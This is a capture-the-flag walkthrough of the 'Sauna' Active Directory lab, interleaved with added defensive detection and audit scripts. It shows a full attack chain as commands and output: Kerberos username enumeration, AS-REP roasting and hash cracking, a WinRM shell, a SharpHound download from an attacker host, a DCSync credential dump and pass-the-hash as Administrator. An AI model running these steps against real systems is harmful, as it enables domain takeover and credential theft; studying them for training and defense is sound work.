Sauna
Nmap Enumeration
# Nmap 7.95 scan initiated Mon Jun 2 08:35:05 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up, received echo-reply ttl 127 (0.070s latency).
Scanned at 2025-06-02 08:35:07 CDT for 63s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-02 12:17:14Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1h18m06s
| smb2-time:
| date: 2025-06-02T12:17:22
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35558/tcp): CLEAN (Timeout)
| Check 2 (port 50793/tcp): CLEAN (Timeout)
| Check 3 (port 57297/udp): CLEAN (Timeout)
| Check 4 (port 16897/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 2 08:36:10 2025 -- 1 IP address (1 host up) scanned in 65.47 seconds
SMB Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec smb 10.10.10.175 -u '' -p '' --shares
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
SMB 10.10.10.175 445 SAUNA [-] Error enumerating shares: STATUS_ACCESS_DENIED
HTTP Enumeration
Gobuster
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ gobuster dir -u http://egotistical-bank.local -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://egotistical-bank.local
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/Images (Status: 301) [Size: 160] [--> http://egotistical-bank.local/Images/]
/css (Status: 301) [Size: 157] [--> http://egotistical-bank.local/css/]
/fonts (Status: 301) [Size: 159] [--> http://egotistical-bank.local/fonts/]
/images (Status: 301) [Size: 160] [--> http://egotistical-bank.local/images/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
Username Harvest
We gathered a list of employee names. I’ll use username-anarchy to generate a list of possible common usernames.
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ ~/Documents/tools/username-anarchy/username-anarchy --input-file ./users.txt > users-full.txt
Kerbrute
┌──(wzwr㉿kali)-[~/Documents/tools/kerbrute/dist]
└─$ ./kerbrute_linux_arm64 userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL ~/Documents/htb/sauna/users-full.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 06/02/25 - Ronnie Flathers @ropnop
2025/06/02 08:49:51 > Using KDC(s):
2025/06/02 08:49:51 > 10.10.10.175:88
2025/06/02 08:49:51 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:9c848fdc2ce6c718fb603dca1d0e57c9$...
2025/06/02 08:49:51 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2025/06/02 08:49:51 > Done! Tested 88 usernames (1 valid) in 0.698 seconds
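Before moving on, here is the defender's side of what Kerbrute just did, as an added example that is not part of the original writeup. It has three parts: an audit of userAccountControl for the DONT_REQ_PREAUTH flag (0x400000), and two checks over Security event 4768 records: a burst of result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) failures from one source IP is username enumeration, and a successful TGT request with Pre-Authentication Type 0 and RC4 (0x17) ticket encryption is an AS-REP roast. The account list, the event records and the IP addresses are constructed; real 4768 events usually carry IpAddress as ::ffff:a.b.c.d.

```python
"""Defender's view of what Kerbrute userenum does: username enumeration against
the KDC, then an AS-REP roast of an account that does not require pre-auth.
Added example, not part of the original writeup. All records are constructed;
event field names follow Security event 4768's XML data names."""
from collections import defaultdict

# userAccountControl bits (Microsoft's documented UAC flag values).
NORMAL_ACCOUNT = 0x0200
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed directory snapshot: (sAMAccountName, userAccountControl).
SAMPLE_ACCOUNTS = [
    ("fsmith", NORMAL_ACCOUNT | DONT_REQ_PREAUTH),                    # roastable
    ("hsmith", NORMAL_ACCOUNT),                                        # pre-auth required
    ("old_svc", NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH),   # disabled: KDC refuses anyway
]


def accounts_without_preauth(accounts):
    """Enabled accounts with DONT_REQ_PREAUTH set. Each one can be AS-REP roasted
    by anyone who can reach TCP/88, no credentials needed. The LDAP filter for the
    same thing is (userAccountControl:1.2.840.113556.1.4.803:=4194304)."""
    return sorted(name for name, uac in accounts
                  if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE)


def _ev4768(user, ip, status, preauth_type, etype):
    """Minimal 4768 record. Real events carry IpAddress as ::ffff:a.b.c.d."""
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth_type,
            "TicketEncryptionType": etype}


# Constructed event stream: one host probing guessed names, then roasting fsmith.
SCANNER_IP = "10.10.16.24"
SAMPLE_EVENTS = [
    _ev4768(name, SCANNER_IP, "0x6", "-", "0xffffffff")  # 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN
    for name in ("fergus", "f.smith", "smithf", "fergussmith", "hugo")
] + [
    _ev4768("fsmith", SCANNER_IP, "0x0", "0", "0x17"),     # no pre-auth, RC4 ticket
    _ev4768("hsmith", "10.10.10.50", "0x0", "2", "0x12"),  # ordinary logon, AES256
]


def detect_user_enum(events, threshold=5):
    """Source IPs whose failed 4768s (result 0x6) name at least `threshold`
    distinct unknown users. That 'unknown principal' reply is the oracle Kerbrute
    uses to tell valid usernames from invalid ones, so a burst of it from one
    address is the signature."""
    unknown_by_ip = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 4768 and ev["Status"] == "0x6":
            unknown_by_ip[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: len(names) for ip, names in unknown_by_ip.items()
            if len(names) >= threshold}


def detect_asrep_roast(events):
    """Successful TGT requests with Pre-Authentication Type 0 and an RC4 (0x17)
    ticket: the AS-REP then carries data encrypted under the user's RC4 key,
    which is exactly what hashcat mode 18200 cracks offline."""
    return [(ev["TargetUserName"], ev["IpAddress"]) for ev in events
            if ev["EventID"] == 4768 and ev["Status"] == "0x0"
            and ev["PreAuthType"] == "0" and ev["TicketEncryptionType"] == "0x17"]


if __name__ == "__main__":
    print("no pre-auth required:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("enumeration sources:", detect_user_enum(SAMPLE_EVENTS))
    print("AS-REP roasts:", detect_asrep_roast(SAMPLE_EVENTS))
```

The fix for the finding itself is one checkbox: clearing "Do not require Kerberos preauthentication" on the account makes the KDC demand a timestamp encrypted with the user's key before it hands out anything crackable.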
Nice! We found a user with Kerberos Pre-Authentication disabled. However, I couldn’t crack this hash for some reason…
We can try using GetNPUsers instead.
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ sudo impacket-GetNPUsers -dc-ip 10.10.10.175 -request -outputfile hashes.asreproast 'EGOTISTICAL-BANK.LOCAL/fsmith' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:451a4893469419050736f0d18888bb8d$...
Let’s try to crack this hash again.
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ sudo hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:451a4893469419050736f0d18888bb8d$...:Thestrokes23
...
Success! This time we cracked the hash and got the password. Let’s verify it with crackmapexec.
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec smb 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
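Why the Kerbrute hash would not crack while the GetNPUsers one did: the first line above is `$krb5asrep$18$...` (etype 18, AES256, presumably because Kerbrute's AS-REQ offers AES first and the KDC takes it), the second is `$krb5asrep$23$...` (etype 23, RC4-HMAC, which GetNPUsers requests explicitly), and hashcat mode 18200 accepts etype 23 only. The triage script below is an added example, not from the writeup; its hash lines are constructed with made-up hex and a made-up realm. The same fact is the defender's lever: an account or domain restricted to AES through msDS-SupportedEncryptionTypes leaves an attacker with an AES hash that is far slower to crack, and re-enabling pre-authentication removes the roast entirely.

```python
"""Triage of AS-REP hash lines in the `$krb5asrep$<etype>$user@REALM:hex$hex`
layout that Kerbrute and GetNPUsers print. Added example, not part of the
original writeup; the sample lines are constructed with made-up hex."""
import re

# Layout as written by GetNPUsers -outputfile (and by Kerbrute in the case above);
# a cracked line from hashcat --show appends ':<password>'.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$:]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)(?::(?P<plain>.*))?$"
)
ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96",
               18: "aes256-cts-hmac-sha1-96"}
# hashcat mode 18200 ("Kerberos 5, etype 23, AS-REP") accepts only etype 23.
HASHCAT_18200_ETYPES = {23}


def parse_asrep(line):
    """Split one hash line into its fields; raises ValueError for anything else."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a $krb5asrep$ line: {line[:40]!r}")
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    d["etype_name"] = ETYPE_NAMES.get(d["etype"], "unknown")
    d["hashcat_18200_ok"] = d["etype"] in HASHCAT_18200_ETYPES
    return d


def triage(lines):
    """One summary per parseable line; unparseable lines (banners, '...') are skipped."""
    summaries = []
    for line in lines:
        try:
            p = parse_asrep(line)
        except ValueError:
            continue
        summaries.append({k: p[k] for k in
                          ("user", "realm", "etype", "etype_name", "hashcat_18200_ok", "plain")})
    return summaries


# Constructed lines mirroring the two shapes seen above (fake hex, fake realm).
KERBRUTE_LINE = "$krb5asrep$18$fsmith@EXAMPLE.LOCAL:" + "ab" * 16 + "$" + "cd" * 40
GETNPUSERS_LINE = "$krb5asrep$23$fsmith@EXAMPLE.LOCAL:" + "12" * 16 + "$" + "34" * 40
CRACKED_LINE = GETNPUSERS_LINE + ":example-password"

if __name__ == "__main__":
    for s in triage([KERBRUTE_LINE, "...", GETNPUSERS_LINE, CRACKED_LINE]):
        verdict = "-m 18200" if s["hashcat_18200_ok"] else "not crackable with -m 18200"
        print(f'{s["user"]}@{s["realm"]} etype {s["etype"]} ({s["etype_name"]}): {verdict}')
```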
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> cat ../Desktop/user.txt
68c1e0f7a888e631c4d734277eee73e8
*Evil-WinRM* PS C:\Users\FSmith\Documents>
Post-Exploitation
Quick Check
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\FSmith\Documents>
Let’s gather domain information first using BloodHound!
Bloodhound
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls
*Evil-WinRM* PS C:\Users\FSmith\Documents> iwr -uri http://10.10.16.24/SharpHound.ps1 -Outfile SharpHound.ps1
*Evil-WinRM* PS C:\Users\FSmith\Documents> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\FSmith\Documents\ -OutputPrefix "htb"
Note that if we fully compromise the SAUNA.EGOTISTICAL-BANK.LOCAL machine (where we currently have only a low-privileged shell), its computer account can DCSync, so we could dump domain user credentials!
Another possible attack vector is svc_loanmgr, which has DCSync rights over the domain. If we compromise this account, we can abuse it.
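Added example, not from the writeup, with constructed ACEs and 4662 records: the audit side of that BloodHound finding, i.e. listing the principals that hold DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object, and the detection side, i.e. flagging Security event 4662 entries that exercise those extended rights from a subject other than a domain controller's computer account. The GUIDs are the schema's rightsGuid values for those extended rights; the set of expected principals is an assumption for the sample domain, and in a real one it is whatever your domain legitimately grants replication to.

```python
"""Two defender-side views of DCSync. Added example, not part of the original
writeup; the ACEs and 4662 records are constructed.
(1) Audit: who holds the replication extended rights on the domain object.
(2) Detection: Security event 4662 entries whose Properties list those rights'
    GUIDs, from any subject that is not a domain controller's computer account."""
import re

# rightsGuid values of the replication extended rights in the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def audit_replication_aces(aces, expected_principals):
    """Trustees holding a replication right on the domain object that are not in
    `expected_principals` (whatever your domain legitimately grants them to).
    Get-Changes plus Get-Changes-All is all DCSync needs."""
    findings = {}
    for ace in aces:
        right = REPLICATION_RIGHTS.get(ace["object_type"].lower())
        if right and ace["allow"] and ace["trustee"] not in expected_principals:
            findings.setdefault(ace["trustee"], set()).add(right)
    return findings


def detect_dcsync(events, domain_controllers):
    """4662 events exercising a replication right from a non-DC subject. Needs
    'Audit Directory Service Access' plus a SACL for Control Access on the domain
    object, or 4662 is never written at all."""
    dc_accounts = {dc.upper() + "$" for dc in domain_controllers}
    alerts = []
    for ev in events:
        if ev["EventID"] != 4662:
            continue
        used = {g.lower() for g in GUID_RE.findall(ev["Properties"])} & set(REPLICATION_RIGHTS)
        if used and ev["SubjectUserName"].upper() not in dc_accounts:
            alerts.append({"subject": ev["SubjectUserName"],
                           "rights": sorted(REPLICATION_RIGHTS[g] for g in used)})
    return alerts


# Constructed ACL of the domain object (object_type = extended right GUID).
GET_CHANGES, GET_CHANGES_ALL = list(REPLICATION_RIGHTS)[:2]
SAMPLE_ACES = [
    {"trustee": "Domain Controllers", "object_type": GET_CHANGES_ALL, "allow": True},
    {"trustee": "Administrators", "object_type": GET_CHANGES, "allow": True},
    {"trustee": "svc_loanmgr", "object_type": GET_CHANGES, "allow": True},
    {"trustee": "svc_loanmgr", "object_type": GET_CHANGES_ALL, "allow": True},
    {"trustee": "fsmith", "object_type": "00000000-0000-0000-0000-000000000000", "allow": True},
]
# Assumption for the sample domain: these principals are supposed to replicate.
EXPECTED_PRINCIPALS = {"Administrators", "Domain Controllers", "Enterprise Domain Controllers"}

# Constructed 4662 records; Properties is the multi-line GUID list the event carries.
REPL_PROPS = "\n\t{%s}\n\t{%s}" % (GET_CHANGES, GET_CHANGES_ALL)
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "Properties": REPL_PROPS},       # DC replicating
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "Properties": REPL_PROPS},  # DCSync
    {"EventID": 4662, "SubjectUserName": "fsmith",
     "Properties": "\n\t{00000000-0000-0000-0000-000000000000}"},                   # unrelated access
]

if __name__ == "__main__":
    print(audit_replication_aces(SAMPLE_ACES, EXPECTED_PRINCIPALS))
    print(detect_dcsync(SAMPLE_4662, ["SAUNA"]))
```

Both checks would have caught this box: the ACL audit lists svc_loanmgr as an unexpected holder of both rights, and the first DRSUAPI replication from that account shows up as a 4662 from a non-DC subject.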
winPEASx64
╔══════════╣ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
We found credentials! Let’s verify them.
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'svc_loanmanager' -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround!
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
In this case, we can use secretsdump with the svc_loanmgr credentials to abuse DCSync.
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ sudo impacket-secretsdump "EGOTISTICAL-BANK.LOCAL/svc_loanmgr":'Moneymakestheworldgoround!'@10.10.10.175
[sudo] password for wzwr:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:c4f376075912ca7f2577a8316ed9535a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ecc3ef9be8e65f6ef07bfcb8f230ac4d9f214aacc499e6c078b8eb95cba96cab
SAUNA$:aes128-cts-hmac-sha1-96:022575cf79a79f1bdb25336499c92cfe
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
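The dump above is worth reading beyond the Administrator line: FSmith and HSmith carry the same NT hash (58a52d36c84fb7f5f1beab9a201db1dd), i.e. the same password, and the krbtgt keys are out, which after a real incident means resetting krbtgt twice. As an added example that is not part of the writeup, here is a parser for secretsdump's `domain\user:rid:lmhash:nthash:::` lines with the audits a defender runs over such a dump. The sample text is constructed with made-up hashes, apart from the two well-known empty-password hashes.

```python
"""Audit of a secretsdump-style NTDS dump (domain\\user:rid:lmhash:nthash:::).
Added example, not part of the original writeup. The sample text is constructed
with made-up hashes, apart from the two well-known empty-password hashes."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# One hash line; the DOMAIN\ prefix is optional because secretsdump prints it
# only for some accounts (see the dump above).
LINE_RE = re.compile(r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
                     r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


def parse_dump(text):
    """Hash lines only; [*] status lines and Kerberos-key lines do not match."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            entries.append(d)
    return entries


def audit_dump(entries):
    """Findings a defender wants from such a dump: password reuse (same NT hash on
    several accounts), empty passwords, LM hashes still stored, and the two RIDs
    whose exposure forces a response (500 Administrator; 502 krbtgt, reset twice)."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "shared_nt": {nt: sorted(users) for nt, users in by_nt.items()
                      if len(users) > 1 and nt != EMPTY_NT},
        "empty_nt": sorted(e["user"] for e in entries if e["nt"] == EMPTY_NT),
        "lm_present": sorted(e["user"] for e in entries if e["lm"] != EMPTY_LM),
        "privileged_rids": sorted(e["user"] for e in entries if e["rid"] in (500, 502)),
    }


# Constructed dump in secretsdump's layout (fake hashes; HSmith/FSmith share one).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
EXAMPLE.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
EXAMPLE.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
EXAMPLE.LOCAL\\legacy_svc:1110:0123456789abcdef0123456789abcdef:99887766554433221100ffeeddccbbaa:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:abcdefabcdefabcdefabcdefabcdefab:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
[*] Cleaning up...
"""

if __name__ == "__main__":
    for finding, value in audit_dump(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {value}")
```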
┌──(wzwr㉿kali)-[~/Documents/htb/sauna]
└─$ crackmapexec winrm 10.10.10.175 -u 'administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)